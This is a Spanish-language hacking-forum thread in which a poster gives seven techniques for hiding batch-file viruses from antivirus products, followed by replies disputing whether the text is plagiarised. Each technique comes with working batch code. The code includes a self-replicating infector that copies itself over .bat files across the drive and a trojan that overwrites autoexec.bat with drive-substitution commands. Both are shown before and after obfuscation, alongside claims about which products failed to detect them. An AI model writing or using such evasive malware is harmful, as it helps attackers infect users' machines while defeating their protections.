Tecnicas Anti AV

[Phanton 1000]

* * * *

Tecnicas Anti Av

Esto no lo puse en Batch Porque realmente es mas para nuestros Bichitos pero si les molesta che
favor de moverlo al area correspondiente y editarme este txt Gracias seguimos .

* *Con el fin de hacer de nuestro virus en Batch *:dance: *un poco más discreto, ilegibles o no detectables usamos técnicas de codificación En Batch *:hack: *para engañar a AV y la gente que intenta leer o descifrar el código. Hay muchas maneras diferentes y hoy voy a explicar todas las formas posibles que sé para el cifrado en Batch * AV engañando. *ESET NOD32 Anti-Virus para su gran capacidad heurística y Avast4 Professional Edition para la detección normal. Por favor, recuerde todas las técnicas se han probado en Windows Vista !!!!!
Sugiero usar el su propio BAT. en lugar del Mio *de manera que se comprenda mejor y funciona sin problemas.

Paso 1) EICAR Test de archivo:

AV empresas necesitan una forma de probar si su producto funciona en el ordenador del usuario, pero sin hacer daño a ella, así EICAR nació, una cadena de código universal que pondrá en marcha todos los AV pero mostrará "Archivo de prueba EICAR NO ES UN VIRUS" o algo similar, así que por lo tanto, añadir esta cadena para el comienzo de nuestro código con la esperanza de que el usuario deja funcionar después de ver que es un archivo de prueba y no un virus. Esto le ayudará cuando infecta a personas con conocimientos limitados sobre virus para que definitivamente no es una gran técnica en comparación con los demás, pero, no obstante, aquí es la cadena para el EICAR 'virus' que hay que añadir al principio de su código:
espero comprendan que hazta yo me enrede *:crazy: :crazy: XD *:wate: :wate:

Código:

X5O!P% @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Paso *2) Fake Bytes: *Falsos Bytes

Todos AV sólo buscará los primeros 1000 bytes de un archivo por lotes para cualquier código malicioso, ¿y qué hacemos? Añadimos un montón de cartas en los primeros 1000 bytes de nuestro código, bastante fácil y una excelente manera de eludir los escáneres y en algunos casos, la heurística AV. Así que aquí es exactamente 1000 bytes de código inútil que debe aparecer al comienzo de su código:

Código:

Jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxx​bjnkaskjgbuhyhdgddr
Djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcb​jhnvdjuknvchdhbhvhf

Fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfb​dbcyufreubfuyhfdbk

Fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdr​sognfdhjfdyfdhfdhg

fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgk​jgufdhgjfugfchghjh

hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgj​ifugjiuhdruiryhgui

dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfe​uygfruyfgybfdbkjkd

dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhn​fhngfvjnkfgblkgfng

fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrh​urenyviuntruirtunv

dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgr​jkhvsriulkghnkjhgu

Trick 3) La Norma Técnica de cifrado (SET):

Como indican las siglas que se trata de una técnica mediante la cual el comando 'set' en MS-DOS se utiliza para cifrar el archivo Batch *y hacer que sea difícil para el AV para analizar y para el usuario de interpretar. Hacemos esto mediante la asignación de una variable a un conjunto de comandos, esto podría no tener sentido, pero ver a continuación:
Esto fue detectado como "BAT / Silly.D Virus 'por ESET NOD32:

Código:

for %%a in (*.bat) do copy %0 %%a

Ahora, mediante la encriptación de las variables: de, en, hacer y copia se hará sin ser detectados. Aunque no se detectó mediante el cifrado de sólo una de las variables, esto no siempre será el caso.
Esto no fue detectado por ESET NOD32 o Avast4

Código:

set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a

Esto será complicado para los Mijos entender *:hack: , pero no para las personas con un conocimiento de Batch *a fin de lo que podría hacer es que el cifrado establecido en la parte inferior de su código y, a continuación empezar a leer la parte superior, esto funciona bien con el código de grandes como el usuario tendrá que desplazarse hacia abajo para ver el conjunto de cifrado. Usted puede hacer esto simplemente por tener un comando 'GOTO' goto que el parámetro de descifrado antes de regresar a la clave de cifrado, utilizando más de una variable será mucho más difícil de leer! un ejemplo:

Código:

 @echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect

Paso 4) Carácter de desbordamiento:

Esto es sólo un nombre imponente en la técnica contra un AV que ayudará al ocultar sus líneas y engañar a la AV desde la detección de las señales directamente en su lote. Todo lo que necesitas hacer es agregar caracteres entre cada línea de código, también puede ser números que utiliza el carácter 'n' como se usaba en el gusano Sasser legendario para causar un desbordamiento de búfer. La única pega es que el virus tiene que tener más de 3 o 4 líneas para trabajar eficazmente.
Este es un virus por Ratty que se ha detectado como "BAT / Ratty.Substcde.A de Troya" por ESET NOD32

Código:

 @echo off
ctty nul
 @echo subst e: a:\ > c:\autoexec.bat
 @echo subst d: a:\ >> c:\autoexec.bat
 @echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

Cuando se utilizo la técnica de desbordamiento de caracteres *no fue detectado por ESET NOD32:

Código:

nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
 @echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
 @echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
 @echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
 @echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

Paso 5) GOTO engañador:

Esto es un poco práctico, ya que tiene muy largo y es bastante confusa, dependiendo del tamaño de su código. Sólo funciona con el código que es más largo y luego 5 líneas. Lo que hace es confundir a la AV por dar órdenes goto múltiples para las cadenas del virus es leído por separado y no como una sola expresión por lo que no será detectado.
Este es un virus por Ratty que se ha detectado como "BAT / Ratty.Substcde.A de Troya" por ESET NOD32:

Código:

 @echo off
ctty nul
 @echo subst e: a:\ > c:\autoexec.bat
 @echo subst d: a:\ >> c:\autoexec.bat
 @echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

Usando el engañador de GOTO no fue detectado por ESET NOD32:

Código:

 @echo off
goto a
:f
ctty nul
goto b
:l
 @echo subst e: a:\ > c:\autoexec.bat
goto c
:m
 @echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
 @echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
:a
goto f
:b
goto l
:c
goto m
:d
goto r

Paso 6) Papelera Código:

Esto se refiere a las líneas de código que simplemente no hacer nada, pero por lo que el AV se refiere a su código de trabajo así que lo que hacemos con esto en mente? Ponemos la basura sin sentido entre nuestros códigos reales, sin embargo es importante señalar que las líneas que está utilizando para el código de la basura no se usa para cualquier cosa:
Esto fue detectado como "BAT / Silly.D Virus 'por ESET NOD32:

Código:

for %%a in (*.bat) do copy %0 %%a

Cuando se utiliza el código de basura o basura que no se detectó mirar *:wate:

Código:

set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a

En la primera línea hemos hecho la basura seguro se creó para nada, entonces añadir el código del virus funcionó a la perfección sin ser detectado!

Paso 7) Fake técnica SET: Falsas Tecnicas SET

A pesar de nuestra técnica de cifrado es suficientemente fuerte para que la heurística y la AV técnica hará mucho más difícil de encontrar y también para ser depurado. Esta técnica consiste en el "set% variable% = comando%", salvo que se dan las variables de comandos falsos y después fijar los comandos reales ver más abajo para mayor claridad:

Código:

set acv=ren
set acv=for
set acv=copy
set axv=yes
set axv=for
set lmno=ggg
set lmno=in 
%axv% %%a %lmno% (*.bat) do %acv% %0 %%a

Como se puede ver que cambió el nombre viable un par de veces que comienza a ser difícil, especialmente cuando el código es larga! N AV lo detectará, ya que no ha establecido una cadena, y le dará una heurística muy difícil de emular el código!.

Recuerde que este es para fines educativos no utilizan
Con malicia! esto no garantiza un bichito 100% Indetectable son formas y maneras para futuros bichitos que hagamos siempre en busca de compartir y analizar salu2

Phanton 1000²

Salu2 a Broken_Machine,Cacho,Karlos0793,jdos666

[Marchi]

Se agradece, ¿la traducción?

Vale citar la fuente

http://vx.netlux.org/lib/

[Phanton 1000]

Se agradece, ¿la traducción?

Vale citar la fuente

http://vx.netlux.org/lib/

No mi Apreciado amigo esa no es la fuente esto lo concluimos entre
broken machine y los demas en dado caso la fuente seria esta

Fuente
se ah publicado en varios foros De habla Ingles esta vez vi este foro
y decidi ser parte de ella salu2

[Marchi]

Acá se encuentra publicado el mismo documento (salvo por el Paso 7) con fecha Julio 2009, siendo una traducción practicamente literal. El supuesto autor, es cOrRuPt G3n3t!x.
En cuanto a la fuente que me dirigís, es un foro del cual vos sos Colaborador, y en cual la fecha de publicación fue Octubre 2009.

Salvo que el autor halla sido el mismo, alguién lo copió y ni siquiera se tomo el trabajo de cambiar minimamente los ejemplos.

Saludos